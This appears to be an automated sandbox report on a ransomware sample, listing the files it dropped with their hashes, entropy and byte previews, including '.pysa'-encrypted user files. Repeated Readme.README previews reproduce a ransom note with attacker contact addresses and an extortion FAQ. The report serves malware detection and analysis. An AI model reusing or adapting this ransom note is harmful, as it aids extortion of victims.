                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\NTUSER.DAT.LOG1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):58368
                  Entropy (8bit):7.98634763940801
                  Encrypted:false
                  SSDEEP:1536:ZKIozbmZM5IVwfHspAy9h2iwOkN92Ct02Di5G:pozbmZYj0F9h2Ms9+k
                  MD5:37772B0C9ED04BB76791A1AE0D1AFE5E
                  SHA1:20ADBBC1252EF8419D3FE63118CA1871043A53F1
                  SHA-256:416B7685BFD5655364BEEF2BFD94917B47FB2F993A85B9795456E20F86114486
                  SHA-512:8BDC2CB7C0A2A1C55DB4D0743BE8C79A71E9F6164F6199914714897484F88EE491C22F2739EABCDBCFEFFDB0C1457D4AEA6DEDF75B751E20F96389658E423F83
                  Malicious:false
                  Preview: N.....@....v.M..wGg......Y%..h....M#.f..h...]U..l$..$.-.09....M...8..Fl.U.....J....z..B....^c..bduX\j....5.4.;0.y.../N....1.......L|ha.DPxTG..Y..%.~@m=...yT...5...L........R.t.DO;..."....vT....Krl.l.....i.N.=.zF..\..}D* .d]T|.ni....<zu...W........WM.=.A!9RH....R.C>7.....xx................(.......W`.R....|.C.......u~........;x....z.......:C..TY.9Ep...a..x(.e..)./F.pC.f.Df~......M..>y........-..%.u.;..<.;.kYG...........O.>..pg`/.<c.:....7&.>......vL.................XA.Ie..I.;...R....`......4`q.6.o..........n...pl.T..bI.d.......z...4.!....{.<..hn...0.)..`........Z..p..+...........D....)s.E..'.g.........#......O..\..b~.%I.O.YoX....LGm:.@<...C..a......2..&k$.i:].X..!K.U..2..$gZ...N...M......9..A...'..o4.4..v....P.5|.....`O.6..c..Y)..d.O..XP....y.z.sS.....g.E.s...+....r..O..z..4.L.....D.>'#j./\.A*@m..|F@.BR....%8..r......2o........N0...=K...&..&M.u.!m.a..1...f...GG.....*'....kWK.F!..G.C..@.~?..H...Q#....-..e..B..&0...%-...[........_... Ow.S
                  C:\Users\Default\NTUSER.DAT.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998176251904873
                  Encrypted:true
                  SSDEEP:3072:kcqFqfJyGujlLrZCUupaGOFgyg/XiD5aLPk+Tk1vXB/TVSplHzG3zLe2nx46UYNz:k1FqjOZLdGGg/S48+uvXXSpdGDLhL
                  MD5:EF05D6D59F478635EDF142F29C57D0AB
                  SHA1:6E539C4785A30345BCDB122ADF8E2B9EDE06077F
                  SHA-256:463E944E24137B8A614709B3A12FB939FB801980919A3DD24CEF01ECD241D25E
                  SHA-512:21B868BE54CD7851CD53BF196EE09910604E25BC11996CE4248719CF50C16899CF80110EF51BE518B76287D4EC51CC5356EDA4DA65FBA7FDE589B599899FAD25
                  Malicious:true
                  Preview: ..W.].,@FQ{......|........X{...C.y...O....x.2_..........\:U.......A.K.......D......YP.....a1..p.6.o-..ER...!.IS.#.......r*./.(YHb....1.>..Qb.B.1....o5.z\..A.....d.(.`.k....c\..O.-d=\...7TR.Nh..P]B..|..#0.mr.N.K..?..1...l;*.DY..9.Q.D.28o6QZ.$.(..McZ..]C .C.1.3.}.Z~(...,Po....U.l.:..k6...N..#...#.7%..zt......F.<p....$..|.O8n.s..2..Y...........<..^-.d/.:n....k.9}.....%..OF..^..b.......B.<.mk.....\..[,i........[...97on1..I1[....~H_..:j..sv..#.nd...JC.U.t.j..L..8...x...CT.2R...w..Y.../..9........1..w(1E.......Qr.....4....m.....m....-....Xs.3j.a...g........a!..'#...I.[......Z..t......A.... i..O....4.....z;...].Q.\..3e.<.y.Ee..F.fG.".u.nR[.O..d...nv......J..E6..o.(...@(Q..t".9D.I...^...MgbVQ.$....yPAwrd........zl...9...;oy7.....K..T}~e.M......<.NI0}...-i9.c)|q[q......;[...E.....Dr0....o(]z....P..$.?..@.#U.>H.p..\<.......sa8...6_wc..~."N.P>..K..s8.Q`n.S.x.{.}?...'..BS..%.W..,....O/a.}.,Z.'...rw.4....D.... ..Zv/".Z.k).1.{.U:....V.......Y......Ag.]m
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):66560
                  Entropy (8bit):7.989030198762352
                  Encrypted:false
                  SSDEEP:1536:SrGFHC+BiA4WDRzp24/gkduUTs96fD++4VWRSMG2HG:SpOT9DRzp21yTGqD+cRlNHG
                  MD5:5E4941C2ECB0FF54165EF2625ADCA64F
                  SHA1:11B08E16B1D138311EBD09EE79B768D514A698D6
                  SHA-256:D73709A082AD063CED918CF913E8389D04D4DAD6A96D783CAC63680B7CFAFBC9
                  SHA-512:4C9BC806B042D195D54FB988FF76E4412E3C459D8229850C91A385B268D1BAEAD62D99CD1729D9BD3E002DE0094168DEEEC91042AE6EA443F32157A5E0775785
                  Malicious:false
                  Preview: .mt.{..z..V..2..R.k.siU........6.$\..oPb..5...+..V.Z..o..x..}..v..(..c.<.....W.... .s.p...L.K....6h^..m'.8./..g.....!Y....@.^.`.hwf.....l....E..e.....@yH.....S....y..a.&.-.....:.lbFd.h.y.<g1....Ip.o..x..RV.\.).i....M.x&.8...:...+.d.=..e.dj8.og.\..l....~.-S.Ks.C1.@...M.v.._......t..\..$I.j-.L.......,.|1..PC.;Xs.'.RA.^.....Z..}e..x2..UF...dgv2J.W.o....am.z.~..4N._.@(.Qn.N....-0.>&p.&s..a...Mi.-.:.3.on5G..I{....Kf..b.Mx[....MO.k.J_..=......hS.........6.*.yaA.r....^..5.7xC......Mx...(.h..X........u4+.EN.....5.H.+.........iM.P31..Ay.wm.\...-.N......8.{...,V.W\z.t.. T....%^'...... S....#..~..Po7.4...ZEFR.....j.ULF?c.V.....^..f.Y.....:L>..x.......&...9..}g\v.dF....#.."...q.&`..a......ua.....#.7-&...!.........2.~+.f.&.N.@....h..?`..G....6....J..[...&....n.Di.?m..lIK..n.O.).....I.3...q..{-.8..q..M..J>]8.$..j.RZ@......].T6.......\.\k..K.9......p..o\......|..t.k...2i..&.{.....e.j...C...S..........C...6..o ..q.....oDd....o..pb|.K.C,.`..7...!B.wxz.T...RT..R
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.99952097673692
                  Encrypted:true
                  SSDEEP:12288:t/oQHUGXk2A/2rG4YaLQj8n/Z28K3li8ErdiAr3eD0Dlc8HlF1ZEA:FdHp02+2waKWh214/rp3eADiC7Z/
                  MD5:CEEAF76FAFA0BB03864DCCC738EF16F4
                  SHA1:D7C1EB2E298552F1CC28CA02D0A4040A812676AE
                  SHA-256:8063B3E3F6E1AC8738B94C08E1C74CD56EB445A8D1223DB2DD3F948514CE671B
                  SHA-512:50E4B22A62CE5C732F054E65B5642A9A20386B83291755DFFA740282B1B9A63F5432761C28CDC5DAB8902DF31A06835487712866FABCA272866E5F958DA1C866
                  Malicious:true
                  Preview: ..S#;h.)....+4....G..{....&.`..+js-"0=.NzPt8'G...;G...w..DO..kOJ.:..d.H. ......Rl@...q1dc......xh..2..0y&sL5..O.......@.`......ic.b.[?.P.K....%.y...I.T.C......OW...<.T..>B..!B!:..........8Q;.b....1...5...`..(......`...~h....A........].K.%.5..p......<..D..k}x6..Iieq.Y.i..m1.A.v.4....$E..:..U&-=.N.w.f....x&....i.....:.P!....C&.#....M9.....`jF.o.2.Z.^...1."....|Wx..^....F.5.....\....QXA.W....K.U..!.d""..`)......8;].U4.\.L.j...}+..1y..:@..H..A^!....$pWv......h]t;]).-i..NU..\...a....[...J *....j..."<..y...+'C4..|.d".8..l..Y...U.X.:uQ..6S...do..1....s.[.h.9..V8.t.-..|.>R.c=.....a..^\"..{L.`.B.C.l%.....G.W<X....x.s..a....=.[KG.L....{..V.yU.....".......?*..7m.`..r.`g79..v.[..".Tu.4l+$..O.."........0....'.:1x~.0...{3sJ....>R...S4.b..p...f>u~.6f.6[.R.c...].}.F....IR?.C.{rL.....7J@..qO....E0z.-...x.N.S.bPme..6l......f<s.s[.`..7..0...,...........l..;m.....a:BC._ uQ......O.x../....... ...|.N..<~&E..k.."8.;c.AY.....A...z7G._f.Z.7..........
                  C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):514048
                  Entropy (8bit):7.999446413191148
                  Encrypted:true
                  SSDEEP:12288:VGBS9ujABZMW0/kXLg/Y4nJgVkiALkhtooakyZBYI7:QS9uEBZMt/kyhD4RQBYI7
                  MD5:68FEB6CD8B2633046A698F15CFD17168
                  SHA1:688EB76B3F8259557153E8C1C0529FE3EDAEE742
                  SHA-256:3BA6C5176EC9284170A8325A0E6DA5F2B898812C60381846DA705E86D78AB597
                  SHA-512:9F80C38D564DD167FD7F400DD38D0DE948F83C3D8D022953B71C96DA04391F4AF8FACE1FC661EA65C39532135DB2270F23D3AE9D52E4FAC269B86C041DFCA6CF
                  Malicious:true
                  Preview: .gn...8.......=z...N.Q..i.....p..2...".0.J.F.R......*n...v7...2.l....a.\..EO....K.*c.^...s....,...t..(.JR(...c..b.i..C.f.,@...g.pa%.S..'..~.wq;L..E.3a>.......q.a.U?#(......._I..W....<.e+4.Th.=.q...3.G....E....zm,...ig..a...^].....x..'.h..E.....S..C...k.h..gj0.gU....T.g..J..n.5.8..)....I%U.%.d=.j.. .s..K.C_.d.@......v.&K..`.iD.}....X;..$.. U..oF.j....{...C.:.3.I....p3$.8..b.#..(.$.$..\...B.'L-*E.........]q. ...o`......49...8rD.Q.>T..Y.+.3~.$OUO..*.......*!Ft....a.a.SHZ>WD..,.XcO....3.0.s'....e '.X..e...*...%C....I..8......?......H.r..T5.f...#....i.{.d\.NZf%.b.n..-x...A..:.Ri;x..9..b;T..l.*"Xz."..g..1.m?..._....x.......[...5...a...R..u.M#].>N..hS.[...i..`...;8.ut..r...0..\.]..T.8.......%."..j.g.m..7..L.Q.L.Od.'d.-.K..... .........+..`x...PUd.-.V...aw.....Q...S.g....AQ..T.3.|.U..;'..B....4Q.[.U...'.G...|..i..c...p".....O.....,.........UI.=@.nb..B.<....9.wD...3...}..........[...Oj..q....uJG.........K..9.X.5..)^T.......F....v.y...5..e.... C..u
                  C:\Users\Default\Pictures\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Saved Games\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Default\Videos\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3198
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:41EDA9C2DCD2674BC24D22B41E6A8992
                  SHA1:4B2041AB96DA4C582177F737A7619E473F46EAE4
                  SHA-256:E4EFA6C273D5B853C6319269B3F7EB09FA47CBF159C1ADA970A464386F60F183
                  SHA-512:FAAB6B9EA2F7E6BCF9A8F96C498A025B68CAD9336BF20A54A3E9256FCAB6AD4164E57CE8F03ACAFF1B0E390A61ECFE975D0DD3A244D1819182E1FAAE5FE10690
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Public\Desktop\Acrobat Reader DC.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.783650395533878
                  Encrypted:false
                  SSDEEP:96:o6Mrvwd+Jdfs5W6nUzGsJqqVtPncCNt99zfo+BOBwI:kv1JtEQzGsJqWECzSBl
                  MD5:07FB1B3F4D1DF90243B6BDFC21031B05
                  SHA1:9FC5B2F9F8B509BE641FA036C38298E48A2C1619
                  SHA-256:78903C7342099399CD94B489211D036DD7DBA61DA3A8F07749FE9859E6D89F20
                  SHA-512:BECB77F49F29368D3FB43213FFE004B474F5C3CE790E02C3FD3E8E560BFFCF240989FC88623F3EE6D09500ECCBB9C40B23FD7620E70D43A359345C8B2C98E6E6
                  Malicious:false
                  Preview: @i7..yi9...V.z....H6S..3(%....C.62..Er[..=|......r....>....s9j....=.'.F.T..@..'$'....l(.{.v..B2J...^X....G..E.g....U].e...W.`.....$$>..r$...e+.._....R~#e.Y....}++5.`...NZ.*..S#..h....I.O.....R....3I-%3.>.......h.z..Y..i.J.I.@....b.GQ.......A.....Q.....@Z.......Y.ji..N.Q.~;:...%..i.$.\..t...1i...w.j.I......?J..M.w?..0.....~?8v../.l....5.Q...\5#p...../..m..9...3..........i.It).Q..q..K..k."..T....JcI..9n.|i./Yj.n....fU.0.#4.A....[..#+........].......V...\........B....6.=....)b......yv..o..\.'....A5......dy,..n5..4..k......//.+1l.y.h....P.,.,T.9Q&T.........<...Y...a.VZ.$..=..F.l.&P.2..4...........%y.`..P2.~.o.=......'....}R.......s......... .6.........#.D.....*...I}.|.%..zf..N...^..C.....h..*.......sN.......~V...~...d.:..%.|...3V...#[.V*@...4g=z.!.U|(.]....| ...cV...2"..w%0...f..gr....x..y/..!9.F...Ft .@....#..$1.xk.0..;.....Bwf..O.........O.L.qx........}.....[>.......PM.DQ../$:t.$Q......^....C........=....f.E..j7......Pt....$.>.78....Vz'..&
                  C:\Users\Public\Desktop\Google Chrome.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.78489587711038
                  Encrypted:false
                  SSDEEP:96:Mz3lpXc8ZTYFyazdGqnPSY5ESF4vIROxqxIfH2kOYFEkN:SC8tYFyakE5leIRsqWv1OYFEI
                  MD5:D4399B8B284FC01E489D90BF383ECB62
                  SHA1:0613D1D8320E0459440FE951A9939675CDEBE4EC
                  SHA-256:0A2D9AD7D651635AB7213B2DEBED9BE14F39FBA5799FA4FB0ACE4BFC27B80572
                  SHA-512:058906A7CDDD9DD29BB60043D0653F66F9BF52D41AF41417F41B550FF8A7BDF93C840CCE91B9C9EBF993456912E7D8074829A33F2B0BCDD7496B735906EE15F4
                  Malicious:false
                  Preview: wX.....M....^\m!z.8v....`.e.~.v..4.......)...4...k..+}....)......7.pu...../....\;.....J.{.J.>mB.......Y4Sx..B.ip.A..k/...[.T.Q..b..w.yZ;...3....G1..!...KN.Q.....U..0?5=G...xc.......T<.y.o.........M<V......(`y'.X........}....)..Z.n...<LG...?.!.z..kS...C%...K....j.p...Q.s9...7.A.;J..BN..l...X..{l.G.S2...B.5..7^.;.h.c.kj..xX..t. ...1wm......7...1V!..M..76K.}......t.......\..u.....1....d.....&o .h.B..r..lO..m|n9..[.v....M4..4.N....$..tP..@..xV..~<V...%.q.)SK/A..j....._.f..?8.....l.s.....u^Jw..U..^....+.~..t.0..6,r.'.B....0.$...Y.gc~.A..-Sl@:W].....T..o9<4.r__..0w.<x.....l.o...C...c\...q.K.........Y.&.PS..n.t...p.O.:m. ...r4.8.W,L9b.K}.Z9........g..p.c.Zj..a.s)V....B..Y.XXF...kjrnmbI.<.#...b8..4..&.....e.."S.T.....j.."V.]..I1...h............t^.%....{.g..L...V../9...~...c6..0.g........<]..*.,.W......9Y...Pt..u...!_.V...=@I..>\.....6.i.f..x...8.{.?.a.d5?P.....awSfV&...|3.2....>p.....d.U@.e....v...r.#./..g.9`.D..<...,.+Oex.#$..}.n.Ao..{...,H..
                  C:\Users\Public\Desktop\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Public\Documents\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Public\Music\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Public\Pictures\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\Public\Videos\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
